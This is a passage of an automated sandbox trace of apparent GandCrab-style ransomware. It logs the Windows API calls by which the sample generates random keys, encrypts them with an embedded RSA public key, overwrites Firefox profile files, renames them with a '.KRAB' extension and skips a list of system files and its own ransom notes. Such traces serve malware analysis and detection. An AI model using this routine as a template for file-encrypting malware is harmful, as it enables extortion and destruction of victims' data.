flProtect=0x4) returned 0x2f50000 [0082.988] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x10110a0) returned 1 [0082.990] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0082.990] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.991] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.991] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x20, pbBuffer=0x338e2cc | out: pbBuffer=0x338e2cc) returned 1 [0082.991] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0082.991] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.991] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x10111b0) returned 1 [0082.993] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0082.994] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.996] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.996] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x8, pbBuffer=0x338e2ec | out: pbBuffer=0x338e2ec) returned 1 [0082.996] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0082.997] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.997] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x1011678) returned 1 [0082.998] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x10235f8) returned 1 [0082.998] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0082.998] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e25c*=0x100) returned 1 [0082.999] GetLastError () returned 0x0 [0082.999] CryptDestroyKey (hKey=0x10235f8) returned 1 [0082.999] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0082.999] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x1011898) returned 1 [0083.000] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x1023038) returned 1 [0083.000] CryptGetKeyParam (in: hKey=0x1023038, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0083.000] CryptEncrypt (in: hKey=0x1023038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e25c*=0x100) returned 1 [0083.001] GetLastError () returned 0x0 [0083.001] CryptDestroyKey (hKey=0x1023038) returned 1 [0083.001] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0083.001] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x718 [0083.003] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0083.003] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.003] ReadFile (in: hFile=0x718, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e2fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e2fc*=0x29c5, lpOverlapped=0x0) returned 1 [0083.037] SetFilePointerEx (in: hFile=0x718, liDistanceToMove=0xffffd63b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.037] WriteFile (in: hFile=0x718, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x29c5, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e2f8*=0x29c5, lpOverlapped=0x0) returned 1 [0083.037] WriteFile (in: hFile=0x718, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e2f8*=0x208, lpOverlapped=0x0) returned 1 [0083.038] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.044] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.045] CloseHandle (hObject=0x718) returned 1 [0083.045] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.045] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\saved-telemetry-pings\\d896fec9-1a7a-4db1-a3a2-e46d95b631a5.krab")) returned 1 [0083.046] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.047] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0083.047] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0083.047] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0083.047] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\KRAB-DECRYPT.txt" [0083.047] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.047] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\KRAB-DECRYPT.txt.KRAB") returned 123 [0083.047] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\KRAB-DECRYPT.txt") returned 118 [0083.047] lstrlenW (lpString=".txt") returned 4 [0083.047] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.048] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0083.048] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.048] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\KRAB-DECRYPT.txt") returned 118 [0083.048] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\KRAB-DECRYPT.txt") returned 118 [0083.048] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0083.048] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0083.048] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0083.048] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0083.048] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0083.048] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0083.048] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0083.048] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0083.048] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0083.048] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0083.048] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.049] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0083.049] FindClose (in: hFindFile=0x1022ff8 | out: hFindFile=0x1022ff8) returned 1 [0083.049] CloseHandle (hObject=0x7ec) returned 1 [0083.049] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0083.049] lstrcmpW (lpString1="search.json.mozlz4", lpString2=".") returned 1 [0083.049] lstrcmpW (lpString1="search.json.mozlz4", lpString2="..") returned 1 [0083.049] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="search.json.mozlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4" [0083.049] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.050] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4.KRAB") returned 103 [0083.050] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4") returned 98 [0083.050] lstrlenW (lpString=".mozlz4") returned 7 [0083.050] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.050] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mozlz4 ") returned 8 [0083.050] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.050] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4") returned 98 [0083.051] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4") returned 98 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="desktop.ini") returned 1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="autorun.inf") returned 1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="ntuser.dat") returned 1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="iconcache.db") returned 1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="bootsect.bak") returned 1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="boot.ini") returned 1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="ntuser.dat.log") returned 1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="thumbs.db") returned -1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="KRAB-DECRYPT.html") returned 1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="ntldr") returned 1 [0083.051] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="NTDETECT.COM") returned 1 [0083.052] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="Bootfont.bin") returned 1 [0083.052] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.052] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011678) returned 1 [0083.053] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.054] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.054] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.054] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0083.054] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0083.055] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.055] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010df8) returned 1 [0083.057] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.057] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.057] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.057] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0083.057] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0083.057] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.058] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10112c0) returned 1 [0083.059] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0083.059] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0083.059] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0083.060] GetLastError () returned 0x0 [0083.060] CryptDestroyKey (hKey=0x10235f8) returned 1 [0083.060] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0083.060] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011898) returned 1 [0083.061] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10231f8) returned 1 [0083.061] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0083.061] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0083.063] GetLastError () returned 0x0 [0083.063] CryptDestroyKey (hKey=0x10231f8) returned 1 [0083.063] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0083.063] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\search.json.mozlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0083.064] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0083.065] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.065] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x62cf, lpOverlapped=0x0) returned 1 [0083.123] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffff9d31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.124] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x62cf, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x62cf, lpOverlapped=0x0) returned 1 [0083.124] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0083.124] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.128] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.128] CloseHandle (hObject=0x7ec) returned 1 [0083.128] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.129] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\search.json.mozlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\search.json.mozlz4.krab")) returned 1 [0083.130] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.130] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0083.130] lstrcmpW (lpString1="secmod.db", lpString2=".") returned 1 [0083.130] lstrcmpW (lpString1="secmod.db", lpString2="..") returned 1 [0083.130] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="secmod.db" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db" [0083.130] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.130] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db.KRAB") returned 94 [0083.131] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db") returned 89 [0083.131] lstrlenW (lpString=".db") returned 3 [0083.131] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.131] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".db ") returned 4 [0083.131] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.131] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db") returned 89 [0083.131] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db") returned 89 [0083.131] lstrcmpiW (lpString1="secmod.db", lpString2="desktop.ini") returned 1 [0083.131] lstrcmpiW (lpString1="secmod.db", lpString2="autorun.inf") returned 1 [0083.131] lstrcmpiW (lpString1="secmod.db", lpString2="ntuser.dat") returned 1 [0083.131] lstrcmpiW (lpString1="secmod.db", lpString2="iconcache.db") returned 1 [0083.132] lstrcmpiW (lpString1="secmod.db", lpString2="bootsect.bak") returned 1 [0083.132] lstrcmpiW (lpString1="secmod.db", lpString2="boot.ini") returned 1 [0083.132] lstrcmpiW (lpString1="secmod.db", lpString2="ntuser.dat.log") returned 1 [0083.132] lstrcmpiW (lpString1="secmod.db", lpString2="thumbs.db") returned -1 [0083.132] lstrcmpiW (lpString1="secmod.db", lpString2="KRAB-DECRYPT.html") returned 1 [0083.132] lstrcmpiW (lpString1="secmod.db", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.132] lstrcmpiW (lpString1="secmod.db", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.132] lstrcmpiW (lpString1="secmod.db", lpString2="ntldr") returned 1 [0083.132] lstrcmpiW (lpString1="secmod.db", lpString2="NTDETECT.COM") returned 1 [0083.132] lstrcmpiW (lpString1="secmod.db", lpString2="Bootfont.bin") returned 1 [0083.132] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.132] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010c60) returned 1 [0083.134] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.135] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.135] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.135] CryptGenRandom (in: hProv=0x1010c60, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0083.135] CryptReleaseContext (hProv=0x1010c60, dwFlags=0x0) returned 1 [0083.135] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.135] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011018) returned 1 [0083.137] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.137] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.137] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.137] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0083.137] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0083.138] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.138] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010820) returned 1 [0083.139] CryptImportKey (in: hProv=0x1010820, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1022ff8) returned 1 [0083.139] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0083.139] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0083.140] GetLastError () returned 0x0 [0083.140] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0083.140] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0083.140] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011348) returned 1 [0083.141] CryptImportKey (in: hProv=0x1011348, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0083.142] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0083.142] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0083.142] GetLastError () returned 0x0 [0083.142] CryptDestroyKey (hKey=0x10235f8) returned 1 [0083.142] CryptReleaseContext (hProv=0x1011348, dwFlags=0x0) returned 1 [0083.142] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\secmod.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0083.143] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) 